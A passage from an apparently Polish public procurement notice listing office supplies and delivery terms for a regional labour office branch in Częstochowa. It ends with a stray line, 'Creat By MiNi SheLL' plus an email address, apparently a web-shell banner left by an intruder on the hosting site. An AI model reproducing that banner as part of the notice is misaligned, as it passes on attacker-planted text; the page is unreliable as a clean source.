łebki, kolorowe, 100 szt. w opakowaniu.- 2 op. Nożyczki do wszechstronnego zastosowania 21 cm; podgumowane uchwyty na palce. - 1 szt. Płyty DVD 4,7 GB do nagrywania, 50szt w opakowaniu. - 1 op. Skoroszyty zawieszkowe Opakowanie 10 szt., wykonany z PCV, twardy, wymiary: 232x314 - 5 op. Kalkulator 12 pozycyjny wyświetlacz, plastikowe klawisze, ilość pól wyświetlacza: 12, podwójne zasilanie, klawisz podwójnego zera, wymiary: 128,5x130x34 mm - 2 szt. Teczka do podpisów format A4, 16 przekładek, wykonana z kartonu pokrytego skóropodobnym tworzywem, grzbiet wykonany harmonijkowo, przekładki kartonowe białe z dziurkami, - 1 szt.

Przedmiot zamówienia należy  dostarczyć na koszt Wykonawcy do siedziby Wojewódzkiego Urzędu Pracy - filia w Częstochowie Aleja Niepodległości 20/22, do pokoju 246 - II piętro, od poniedziałku do piątku w godz. 8.00 -14.00, w terminie 7 dno od dnia zawarcia umowy. Wykonawca zobowiązany jest do sporządzenia protokołu zdawczo - odbiorczego w 2 egzemplarzach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com